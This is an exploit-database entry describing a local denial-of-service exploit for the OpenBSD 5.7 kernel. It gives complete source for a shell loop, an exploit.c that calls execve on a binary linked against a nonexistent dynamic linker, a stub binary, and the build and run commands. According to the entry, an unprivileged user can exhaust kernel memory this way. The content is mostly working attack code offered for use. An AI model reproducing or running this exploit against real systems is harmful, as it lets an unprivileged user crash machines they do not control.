OpenBSD 5.7 Local Denial Of Service Exploit

2015-08-04T00:00:00
ID 1337DAY-ID-23959
Type zdt
Reporter Brainy
Modified 2015-08-04T00:00:00

Description

Exploit for bsd platform in category local exploits

                                        
                                            /*
* 2015, Maxime Villard
* Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged
* user. Found by The Brainy Code Scanner.
*/

- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -

#! /bin/sh
while true
do
systrace -A ./exploit
done

- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
execve("bin", argv, NULL);
}

- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -

int main() {}

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

$ gcc -o exploit exploit.c
$ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c
$ ./script.sh

Wait a bit, and the kernel will run out of memory.

#  0day.today [2018-03-12]  #